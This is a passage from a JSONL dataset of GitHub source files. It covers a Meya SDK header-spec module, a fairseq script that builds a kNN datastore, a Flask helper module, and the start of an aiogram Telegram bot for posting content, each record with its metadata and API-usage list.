"pytransact.commit", "line_number": 1261, "usage_type": "name"}, {"api_name": "pytransact.commit.Commit.handle", "line_number": 1264, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit", "line_number": 1264, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 1264, "usage_type": "name"}, {"api_name": "pytransact.commit.Commit", "line_number": 1268, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1268, "usage_type": "name"}, {"api_name": "pytransact.object.attribute.BlobVal", "line_number": 1269, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit", "line_number": 1286, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1286, "usage_type": "name"}, {"api_name": "pytransact.object.attribute.BlobVal", "line_number": 1287, "usage_type": "call"}, {"api_name": "bson.objectid.ObjectId", "line_number": 1297, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit.fromdoc", "line_number": 1298, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit", "line_number": 1298, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 1298, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 1304, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit", "line_number": 1305, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1305, "usage_type": "name"}, {"api_name": "pytransact.commit.Commit.fromquery", "line_number": 1308, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit", "line_number": 1308, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 1308, "usage_type": "name"}]} +{"seq_id": "20375758981", "text": "from dataclasses import dataclass\nfrom dataclasses import field\nfrom meya.button.spec import ButtonElementSpecUnion\nfrom meya.button.spec import ButtonEventSpec\nfrom meya.icon.spec import IconElementSpecUnion\nfrom meya.icon.spec import IconEventSpec\nfrom meya.trigger.entry.activate import TriggerActivateEntry\nfrom numbers import Real\nfrom typing import List\nfrom typing import Optional\nfrom typing import Union\n\n\n@dataclass\nclass HeaderTitleCommonSpec:\n text: Optional[str] = field(default=None)\n\n\n@dataclass\nclass HeaderTitleElementSpec(HeaderTitleCommonSpec):\n icon: Optional[IconElementSpecUnion] = field(default=None)\n\n\nHeaderTitleElementSpecUnion = Union[HeaderTitleElementSpec, str, bool]\n\n\n@dataclass\nclass HeaderTitleEventSpec(HeaderTitleCommonSpec):\n icon: Optional[IconEventSpec] = field(default=None)\n\n @classmethod\n def from_element_spec_union(\n cls, title: HeaderTitleElementSpecUnion\n ) -> \"HeaderTitleEventSpec\":\n if isinstance(title, str):\n return HeaderTitleEventSpec(text=title)\n elif isinstance(title, HeaderTitleElementSpec):\n return HeaderTitleEventSpec(\n text=title.text,\n icon=IconEventSpec.from_element_spec(title.icon),\n )\n else:\n return HeaderTitleEventSpec()\n\n\n@dataclass\nclass HeaderProgressCommonSpec:\n value: Optional[Real] = field(default=None)\n show_percent: Optional[bool] = field(default=None)\n\n\n@dataclass\nclass HeaderProgressElementSpec(HeaderProgressCommonSpec):\n pass\n\n\nHeaderProgressElementSpecUnion = Union[HeaderProgressElementSpec, Real, bool]\n\n\n@dataclass\nclass HeaderProgressEventSpec(HeaderProgressCommonSpec):\n @classmethod\n def from_element_spec_union(\n cls, progress: HeaderProgressElementSpecUnion\n ) -> \"HeaderProgressEventSpec\":\n if isinstance(progress, Real):\n return HeaderProgressEventSpec(value=progress)\n elif isinstance(progress, HeaderProgressElementSpec):\n return HeaderProgressEventSpec(\n value=progress.value, show_percent=progress.show_percent\n )\n else:\n return HeaderProgressEventSpec()\n\n\n@dataclass\nclass HeaderMilestoneCommonSpec:\n text: Optional[str] = field(default=None)\n current: bool = field(default=False)\n\n\n@dataclass\nclass HeaderMilestoneElementSpec(HeaderMilestoneCommonSpec):\n pass\n\n\nHeaderMilestoneElementSpecUnion = Union[HeaderMilestoneElementSpec, str, bool]\n\n\n@dataclass\nclass HeaderMilestoneEventSpec(HeaderMilestoneCommonSpec):\n @classmethod\n def from_element_spec_union_list(\n cls, milestones: List[HeaderMilestoneElementSpecUnion]\n ) -> List[\"HeaderMilestoneEventSpec\"]:\n return [\n cls.from_element_spec_union(milestone) for milestone in milestones\n ]\n\n @classmethod\n def from_element_spec_union(\n cls, milestone: HeaderMilestoneElementSpecUnion\n ) -> \"HeaderMilestoneEventSpec\":\n if isinstance(milestone, str):\n return HeaderMilestoneEventSpec(text=milestone)\n elif isinstance(milestone, bool):\n return HeaderMilestoneEventSpec(current=milestone)\n else:\n return HeaderMilestoneEventSpec(\n text=milestone.text, current=milestone.current\n )\n\n\n@dataclass\nclass HeaderCommonSpec:\n pass\n\n\n@dataclass\nclass HeaderElementSpec(HeaderCommonSpec):\n buttons: Optional[List[ButtonElementSpecUnion]] = field(default=None)\n title: Optional[HeaderTitleElementSpecUnion] = field(default=None)\n progress: Optional[HeaderProgressElementSpecUnion] = field(default=None)\n milestones: Optional[List[HeaderMilestoneElementSpecUnion]] = field(\n default=None\n )\n extra_buttons: Optional[List[ButtonElementSpecUnion]] = field(default=None)\n\n\n@dataclass\nclass HeaderEventSpec(HeaderCommonSpec):\n buttons: Optional[List[ButtonEventSpec]] = field(default=None)\n title: Optional[HeaderTitleEventSpec] = field(default=None)\n progress: Optional[HeaderProgressEventSpec] = field(default=None)\n milestones: Optional[List[HeaderMilestoneEventSpec]] = field(default=None)\n extra_buttons: Optional[List[ButtonEventSpec]] = field(default=None)\n\n @classmethod\n def from_element_spec(\n cls, header: HeaderElementSpec, skip_triggers: bool = False\n ) -> (\"HeaderEventSpec\", List[TriggerActivateEntry]):\n buttons, button_triggers = (\n (None, [])\n if header.buttons is None\n else ButtonEventSpec.from_element_spec_union_list(\n header.buttons, skip_triggers=skip_triggers\n )\n )\n title = (\n None\n if header.title is None\n else HeaderTitleEventSpec.from_element_spec_union(header.title)\n )\n progress = (\n None\n if header.progress is None\n else HeaderProgressEventSpec.from_element_spec_union(\n header.progress\n )\n )\n milestones = (\n None\n if header.milestones is None\n else HeaderMilestoneEventSpec.from_element_spec_union_list(\n header.milestones\n )\n )\n extra_buttons, extra_button_triggers = (\n (None, [])\n if header.extra_buttons is None\n else ButtonEventSpec.from_element_spec_union_list(\n header.extra_buttons, skip_triggers=skip_triggers\n )\n )\n return (\n HeaderEventSpec(\n buttons=buttons,\n title=title,\n progress=progress,\n milestones=milestones,\n extra_buttons=extra_buttons,\n ),\n [*button_triggers, *extra_button_triggers],\n )\n\n def __or__(self, other: \"HeaderEventSpec\") -> \"HeaderEventSpec\":\n return HeaderEventSpec(\n buttons=self.buttons\n if self.buttons is not None\n else other.buttons,\n title=self.title if self.title is not None else other.title,\n progress=self.progress\n if self.progress is not None\n else other.progress,\n milestones=self.milestones\n if self.milestones is not None\n else other.milestones,\n extra_buttons=self.extra_buttons\n if self.extra_buttons is not None\n else other.extra_buttons,\n )\n", "repo_name": "meya-customers/meya-sdk", "sub_path": "meya/event/header_spec.py", "file_name": "header_spec.py", "file_ext": "py", "file_size_in_byte": 6413, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.Optional", "line_number": 16, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 16, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 14, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 21, "usage_type": "name"}, {"api_name": "meya.icon.spec.IconElementSpecUnion", "line_number": 21, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 21, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 19, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 29, "usage_type": "name"}, {"api_name": "meya.icon.spec.IconEventSpec", "line_number": 29, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 29, "usage_type": "call"}, {"api_name": "meya.icon.spec.IconEventSpec.from_element_spec", "line_number": 40, "usage_type": "call"}, {"api_name": "meya.icon.spec.IconEventSpec", "line_number": 40, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 27, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 48, "usage_type": "name"}, {"api_name": "numbers.Real", "line_number": 48, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 48, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 49, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 49, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 46, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 52, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 57, "usage_type": "name"}, {"api_name": "numbers.Real", "line_number": 57, "usage_type": "name"}, {"api_name": "numbers.Real", "line_number": 66, "usage_type": "argument"}, {"api_name": "dataclasses.dataclass", "line_number": 60, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 78, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 78, "usage_type": "call"}, {"api_name": "dataclasses.field", "line_number": 79, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 76, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 82, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 87, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 94, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 95, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 90, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 114, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 121, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 121, "usage_type": "name"}, {"api_name": "meya.button.spec.ButtonElementSpecUnion", "line_number": 121, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 121, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 122, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 122, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 123, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 123, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 124, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 124, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 124, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 127, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 127, "usage_type": "name"}, {"api_name": "meya.button.spec.ButtonElementSpecUnion", "line_number": 127, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 127, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 119, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 132, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 132, "usage_type": "name"}, {"api_name": "meya.button.spec.ButtonEventSpec", "line_number": 132, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 132, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 133, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 133, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 134, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 134, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 135, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 135, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 135, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 136, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 136, "usage_type": "name"}, {"api_name": "meya.button.spec.ButtonEventSpec", "line_number": 136, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 136, "usage_type": "call"}, {"api_name": "meya.button.spec.ButtonEventSpec.from_element_spec_union_list", "line_number": 145, "usage_type": "call"}, {"api_name": "meya.button.spec.ButtonEventSpec", "line_number": 145, "usage_type": "name"}, {"api_name": "meya.button.spec.ButtonEventSpec.from_element_spec_union_list", "line_number": 171, "usage_type": "call"}, {"api_name": "meya.button.spec.ButtonEventSpec", "line_number": 171, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 141, "usage_type": "name"}, {"api_name": "meya.trigger.entry.activate.TriggerActivateEntry", "line_number": 141, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 130, "usage_type": "name"}]} +{"seq_id": "33489269570", "text": "import logging\nimport os\nimport sys\nfrom itertools import chain\n\nimport torch\nfrom fairseq import checkpoint_utils, distributed_utils, options, utils\nfrom fairseq.logging import metrics, progress_bar\nfrom tqdm import tqdm\n\nlogging.basicConfig(\n format=\"%(asctime)s | %(levelname)s | %(name)s | %(message)s\",\n datefmt=\"%Y-%m-%d %H:%M:%S\",\n level=os.environ.get(\"LOGLEVEL\", \"INFO\").upper(),\n stream=sys.stdout,\n)\nlogger = logging.getLogger(\"fairseq_cli.validate\")\n\n\n# ------ add by\n# this script is implemented based on validate.py, and refers to the implementation of knnlm\n# we only need to go through the dataset like in training, and save the datastore\n# ------\n\ndef main(args, override_args=None):\n utils.import_user_module(args)\n\n assert (\n args.max_tokens is not None or args.batch_size is not None\n ), \"Must specify batch size either with --max-tokens or --batch-size\"\n\n use_fp16 = args.fp16\n use_cuda = torch.cuda.is_available() and not args.cpu\n\n if use_cuda:\n torch.cuda.set_device(args.device_id)\n\n if override_args is not None:\n overrides = vars(override_args)\n overrides.update(eval(getattr(override_args, \"model_overrides\", \"{}\")))\n else:\n overrides = None\n\n # Load ensemble\n # the task is build based on the checkpoint\n logger.info(\"loading model(s) from {}\".format(args.path))\n models, model_args, task = checkpoint_utils.load_model_ensemble_and_task(\n [args.path],\n arg_overrides=overrides,\n suffix=getattr(args, \"checkpoint_suffix\", \"\"),\n )\n model = models[0]\n\n # Move models to GPU\n for model in models:\n if use_fp16:\n model.half()\n if use_cuda:\n model.cuda()\n\n # print(models[0])\n # exit(0)\n # Print a1rgs\n logger.info(model_args)\n\n # Build criterion, we do not need this, so remove it, by\n # criterion = task.build_criterion(model_args)\n # criterion.eval()\n if args.save_plain_text:\n # we use two lists to save the plain text, where the first list is used to locate the sample (sentence)\n # by index, the second list[dict] contains {start_idx, end_idx, src_tokens, trg_tokens} for each sample\n locate_dict = []\n sentences_array = []\n\n cur_sent_start_idx = 0\n\n try:\n src_dict = getattr(task, \"source_dictionary\", None)\n except NotImplementedError:\n src_dict = None\n tgt_dict = task.target_dictionary\n\n if args.save_source_empty_feature:\n src_dict = getattr(task, \"source_dictionary\", None)\n\n # --- check save data store , add by\n import numpy as np\n if args.dstore_fp16:\n print('Saving fp16')\n dstore_keys = np.memmap(args.dstore_mmap + '/keys.npy', dtype=np.float16, mode='w+',\n shape=(args.dstore_size, args.decoder_embed_dim))\n dstore_vals = np.memmap(args.dstore_mmap + '/vals.npy', dtype=np.int, mode='w+',\n shape=(args.dstore_size, 1))\n else:\n print('Saving fp32')\n dstore_keys = np.memmap(args.dstore_mmap + '/keys.npy', dtype=np.float32, mode='w+',\n shape=(args.dstore_size, args.decoder_embed_dim))\n dstore_vals = np.memmap(args.dstore_mmap + '/vals.npy', dtype=np.int, mode='w+',\n shape=(args.dstore_size, 1))\n\n dstore_idx = 0\n # --- end\n data_idx = 1\n for subset in args.valid_subset.split(\",\"):\n try:\n task.args.required_seq_len_multiple = 1\n task.args.load_alignments = False\n task.load_dataset(subset, combine=False, epoch=data_idx)\n data_idx = data_idx + 1\n dataset = task.dataset(subset)\n except KeyError:\n raise Exception(\"Cannot find dataset: \" + subset)\n\n # Initialize data iterator\n itr = task.get_batch_iterator(\n dataset=dataset,\n max_tokens=args.max_tokens,\n max_sentences=args.batch_size,\n max_positions=utils.resolve_max_positions(\n task.max_positions(),\n *[m.max_positions() for m in models],\n ),\n ignore_invalid_inputs=args.skip_invalid_size_inputs_valid_test,\n required_batch_size_multiple=args.required_batch_size_multiple,\n seed=args.seed,\n num_shards=args.distributed_world_size,\n shard_id=args.distributed_rank,\n num_workers=args.num_workers,\n data_buffer_size=args.data_buffer_size,\n ).next_epoch_itr(False)\n progress = progress_bar.progress_bar(\n itr,\n log_format=args.log_format,\n log_interval=args.log_interval,\n prefix=f\"valid on '{subset}' subset\",\n default_log_format=(\"tqdm\" if not args.no_progress_bar else \"simple\"),\n )\n\n log_outputs = []\n with torch.no_grad():\n model.eval()\n for i, sample in enumerate(progress):\n sample = utils.move_to_cuda(sample) if use_cuda else sample\n # print(sample['net_input']['src_tokens'])\n # print(sample['net_input']['prev_output_tokens'])\n # print(sample['target'])\n # exit(0)\n # -------- add by , we should go through the model with the sample and get the hidden state\n # so we append a forward_and_get_hidden_state_step method in Translation task\n # todo, here we want to record the attention information for each token, which maybe too large\n\n if args.save_denoising_feature:\n sample['net_input']['src_tokens'] = sample['net_input']['noisy_target']\n sample['net_input']['src_lengths'] = sample['net_input']['noisy_target_lengths']\n\n if args.save_source_empty_feature:\n src_batch_size = sample['net_input']['src_tokens'].size(0)\n sample['net_input']['src_tokens'] = torch.zeros((src_batch_size, 1)).fill_(src_dict.eos()).to(sample['target'])\n sample['net_input']['src_lengths'] = torch.ones((src_batch_size, 1)).to(sample['target'])\n\n if not args.activate_adapter:\n features, extra = task.forward_and_get_hidden_state_step(sample, model,\n need_self_attn=args.save_attn_weights, )\n # activate_adapter=args.activate_adapter) # [B, T, H]\n else:\n features, extra = task.forward_and_get_hidden_state_step(sample, model,\n need_self_attn=args.save_attn_weights,\n activate_adapter=args.activate_adapter)\n\n cross_attn = extra['attn'][0] # [B, tgt len, src len]\n self_attn = extra['self_attn'] # [B, tgt len. prev tgt len]\n\n source_length = sample['net_input']['src_lengths'] # [B]\n target = sample['target'] # [B, T]\n\n # get useful parameters\n batch_size = target.size(0)\n seq_len = target.size(1)\n pad_idx = task.target_dictionary.pad()\n target_mask = target.ne(pad_idx) # [B, T]\n\n target_length = torch.sum(target_mask, dim=1).int() # [B]\n\n # remove the pad tokens and related hidden states\n target = target.view(batch_size * seq_len)\n target_mask = target_mask.view(batch_size * seq_len)\n\n non_pad_index = target_mask.nonzero().squeeze(-1) # [n_count]\n target = target.index_select(dim=0, index=non_pad_index) # [n_count]\n\n features = features.contiguous().view(batch_size * seq_len, -1)\n features = features.index_select(dim=0, index=non_pad_index) # [n_count, feature size]\n\n # if save plain text\n if args.save_plain_text:\n cur_token_idx = len(locate_dict)\n\n # here, we save the sent index for each token in every sentence, for example\n # target tokens [s1t1, s1t2, s1t3, s2t1, s2t2, s3t1, s3t2, s3t3, s3t4]\n # sent index [0, 0, 0, 1, 1, 2, 2, 2, 2 ]\n\n cur_token_locate = torch.arange(cur_sent_start_idx, cur_sent_start_idx + batch_size).to(\n target.device) # [B]\n cur_token_locate = cur_token_locate.unsqueeze(-1).expand(batch_size, seq_len).reshape(\n batch_size * seq_len) # [B, T_S]\n cur_token_locate = cur_token_locate.index_select(dim=0, index=non_pad_index).tolist() # [n_count]\n locate_dict += cur_token_locate\n cur_sent_start_idx = cur_sent_start_idx + batch_size\n\n for j in range(0, batch_size):\n sentences_array.append(\n {\n 'start_idx': cur_token_idx,\n 'end_idx': cur_token_idx + target_length[j].item() - 1,\n 'len': target_length[j].item(),\n 'src_tokens_id': sample['net_input']['src_tokens'][j],\n 'trg_tokens_id': sample['target'][j],\n 'cross_attn': cross_attn[j][:target_length[j],\n :source_length[j]].detach().cpu().numpy().astype(\n np.float16) if args.save_attn_weights else None,\n 'self_attn': self_attn[j][:target_length[j],\n :target_length[j]].detach().cpu().numpy().astype(\n np.float16) if args.save_attn_weights else None,\n }\n )\n\n cur_token_idx = cur_token_idx + target_length[j].item()\n\n # save to the dstore\n current_batch_count = target.size(0)\n if dstore_idx + current_batch_count > args.dstore_size:\n reduce_size = args.dstore_size - dstore_idx\n features = features[:reduce_size]\n target = target[:reduce_size]\n if args.save_plain_text:\n src_tokens = src_tokens[:reduce_size, :]\n else:\n reduce_size = current_batch_count\n\n if args.dstore_fp16:\n dstore_keys[dstore_idx:reduce_size + dstore_idx] = features.detach().cpu().numpy().astype(\n np.float16)\n dstore_vals[dstore_idx:reduce_size + dstore_idx] = target.unsqueeze(-1).cpu().numpy().astype(np.int)\n else:\n dstore_keys[dstore_idx:reduce_size + dstore_idx] = features.detach().cpu().numpy().astype(\n np.float32)\n dstore_vals[dstore_idx:reduce_size + dstore_idx] = target.unsqueeze(-1).cpu().numpy().astype(np.int)\n\n dstore_idx += reduce_size\n\n # print(dstore_idx)\n progress.log({'dstore_size': dstore_idx}, step=i)\n if dstore_idx > args.dstore_size:\n print('much more than dstore size break')\n break\n\n elif dstore_idx == args.dstore_size:\n print('just fill')\n # -------- end, by\n\n print(dstore_idx)\n\n if args.save_plain_text:\n\n for sent_dict in tqdm(sentences_array):\n sent_dict['src_sent'] = src_dict.string(sent_dict['src_tokens_id'], return_list=False,\n extra_symbols_to_ignore=[src_dict.pad()])\n sent_dict['trg_tokens'] = tgt_dict.string(sent_dict['trg_tokens_id'], return_list=True,\n extra_symbols_to_ignore=[tgt_dict.pad()])\n sent_dict['trg_tokens'] = sent_dict['trg_tokens'].split(' ')\n sent_dict['trg_tokens'].append('')\n del sent_dict['src_tokens_id']\n del sent_dict['trg_tokens_id']\n\n print(sentences_array[1000])\n\n with open(args.dstore_mmap + '/text.dstore', 'wb') as f:\n import pickle\n pickle.dump({'locate_dict': locate_dict, 'sent_dict': sentences_array}, f)\n\n\ndef cli_main():\n parser = options.get_save_datastore_parser()\n args = options.parse_args_and_arch(parser)\n\n # only override args that are explicitly given on the command line\n override_parser = options.get_save_datastore_parser()\n override_args = options.parse_args_and_arch(override_parser, suppress_defaults=True)\n\n distributed_utils.call_main(args, main, override_args=override_args)\n\n\nif __name__ == \"__main__\":\n cli_main()\n", "repo_name": "zhengxxn/UDA-KNN", "sub_path": "save_datastore.py", "file_name": "save_datastore.py", "file_ext": "py", "file_size_in_byte": 13042, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.basicConfig", "line_number": 11, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 14, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 14, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 15, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 17, "usage_type": "call"}, {"api_name": "fairseq.utils.import_user_module", "line_number": 26, "usage_type": "call"}, {"api_name": "fairseq.utils", "line_number": 26, "usage_type": "name"}, {"api_name": "torch.cuda.is_available", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 33, "usage_type": "attribute"}, {"api_name": "torch.cuda.set_device", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 36, "usage_type": "attribute"}, {"api_name": "fairseq.checkpoint_utils.load_model_ensemble_and_task", "line_number": 47, "usage_type": "call"}, {"api_name": "fairseq.checkpoint_utils", "line_number": 47, "usage_type": "name"}, {"api_name": "numpy.memmap", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.float16", "line_number": 90, "usage_type": "attribute"}, {"api_name": "numpy.memmap", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 92, "usage_type": "attribute"}, {"api_name": "numpy.memmap", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 96, "usage_type": "attribute"}, {"api_name": "numpy.memmap", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 98, "usage_type": "attribute"}, {"api_name": "fairseq.utils.resolve_max_positions", "line_number": 119, "usage_type": "call"}, {"api_name": "fairseq.utils", "line_number": 119, "usage_type": "name"}, {"api_name": "fairseq.logging.progress_bar.progress_bar", "line_number": 131, "usage_type": "call"}, {"api_name": "fairseq.logging.progress_bar", "line_number": 131, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 140, "usage_type": "call"}, {"api_name": "fairseq.utils.move_to_cuda", "line_number": 143, "usage_type": "call"}, {"api_name": "fairseq.utils", "line_number": 143, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 158, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 159, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 182, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.float16", "line_number": 220, "usage_type": "attribute"}, {"api_name": "numpy.float16", "line_number": 223, "usage_type": "attribute"}, {"api_name": "numpy.float16", "line_number": 242, "usage_type": "attribute"}, {"api_name": "numpy.int", "line_number": 243, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 246, "usage_type": "attribute"}, {"api_name": "numpy.int", "line_number": 247, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 265, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 279, "usage_type": "call"}, {"api_name": "fairseq.options.get_save_datastore_parser", "line_number": 283, "usage_type": "call"}, {"api_name": "fairseq.options", "line_number": 283, "usage_type": "name"}, {"api_name": "fairseq.options.parse_args_and_arch", "line_number": 284, "usage_type": "call"}, {"api_name": "fairseq.options", "line_number": 284, "usage_type": "name"}, {"api_name": "fairseq.options.get_save_datastore_parser", "line_number": 287, "usage_type": "call"}, {"api_name": "fairseq.options", "line_number": 287, "usage_type": "name"}, {"api_name": "fairseq.options.parse_args_and_arch", "line_number": 288, "usage_type": "call"}, {"api_name": "fairseq.options", "line_number": 288, "usage_type": "name"}, {"api_name": "fairseq.distributed_utils.call_main", "line_number": 290, "usage_type": "call"}, {"api_name": "fairseq.distributed_utils", "line_number": 290, "usage_type": "name"}]} +{"seq_id": "9285219785", "text": "from datetime import datetime as dt\nfrom datetime import timedelta\nfrom flask import current_app\nimport time\n\n\ndef reformatStringDate(strDate, fromFormat, toFormat):\n datetime_date = dt.strptime(strDate, fromFormat)\n str_date = datetime_date.strftime(toFormat)\n return str_date\n\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower(\n ) in current_app.config['ALLOWED_EXTENSIONS']\n\n\ndef pad_timestamp(filename):\n name = filename.split('.')\n return name[0] + '_' + str(round(time.time())) + '.' + name[1]\n\n\ndef getAmountFishByType(fishtype, fishlist):\n for obj in fishlist:\n if obj['type'] == fishtype:\n return obj['amount']\n return 0\n\n\ndef getYearToday():\n current_year = dt.today().year\n return str(current_year)\n\ndef getListDateBettwenDate(dateA, dateB):\n # Return list of datetime.date objects (inclusive) between start_date and end_date (inclusive).\n date_list = []\n while dateA < dateB:\n date_list.append(dateA)\n dateA += timedelta(days=1)\n date_list.append(dateA)\n print(date_list)\n return date_list\n", "repo_name": "swasw/AquaBreeding_CustomAPI", "sub_path": "fishapiv4/resources/helper.py", "file_name": "helper.py", "file_ext": "py", "file_size_in_byte": 1139, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "datetime.datetime.strptime", "line_number": 8, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 8, "usage_type": "name"}, {"api_name": "flask.current_app.config", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.current_app", "line_number": 16, "usage_type": "name"}, {"api_name": "time.time", "line_number": 21, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 32, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 32, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "13974016346", "text": "\r\nfrom aiogram.dispatcher.filters import IDFilter, Command\r\nimport logging\r\nfrom aiogram import Bot, Dispatcher, types\r\nfrom aiogram.contrib.fsm_storage.memory import MemoryStorage\r\nfrom aiogram.dispatcher import FSMContext, filters\r\nfrom aiogram.dispatcher.filters.state import State, StatesGroup\r\nimport requests\r\nfrom config import *\r\nimport os\r\nimport cloudinary.uploader\r\nimport cloudinary\r\ncloudinary.config(\r\n cloud_name=cloud_name,\r\n api_key=api_key,\r\n api_secret=api_secret\r\n)\r\n\r\n# Инициализация бота и диспетчера\r\nbot = Bot(token=token)\r\nstorage = MemoryStorage()\r\ndp = Dispatcher(bot, storage=storage)\r\n\r\n# Установка уровня логирования\r\nlogging.basicConfig(level=logging.INFO)\r\n\r\nclass NewPostStates(StatesGroup):\r\n waiting_for_title = State() # Ожидание названия\r\n waiting_for_description = State() # Ожидание описания\r\n waiting_for_category = State() # Ожидание категории\r\n waiting_for_photo = State() # Ожидание фото\r\n\r\n\r\n@dp.message_handler(Command('newpost'), IDFilter(user_id=[881704893]))\r\nasync def new_post(message: types.Message):\r\n await message.answer('Введите название поста:')\r\n await NewPostStates.waiting_for_title.set()\r\n\r\n\r\n@dp.message_handler(state=NewPostStates.waiting_for_title)\r\nasync def process_title(message: types.Message, state: FSMContext):\r\n title = message.text\r\n await state.update_data(title=title)\r\n\r\n # Второй запрос - описание поста\r\n await message.answer('Введите описание поста:')\r\n await NewPostStates.waiting_for_description.set()\r\n\r\n# Обработчик ответа на описание поста\r\n@dp.message_handler(state=NewPostStates.waiting_for_description)\r\nasync def process_description(message: types.Message, state: FSMContext):\r\n description = message.text\r\n await state.update_data(description=description)\r\n\r\n # Третий запрос - категория поста\r\n await message.answer('Введите категорию поста:')\r\n await NewPostStates.waiting_for_category.set()\r\n\r\n# Обработчик ответа на категорию поста\r\n@dp.message_handler(state=NewPostStates.waiting_for_category)\r\nasync def process_category(message: types.Message, state: FSMContext):\r\n category = message.text\r\n await state.update_data(category=category)\r\n\r\n # Четвертый запрос - фото\r\n await message.answer('Прикрепите фото:')\r\n await NewPostStates.waiting_for_photo.set()\r\n\r\n# Обработчик фото\r\n@dp.message_handler(content_types=['photo'], state=NewPostStates.waiting_for_photo)\r\nasync def process_photo(message: types.Message, state: FSMContext):\r\n # Получаем 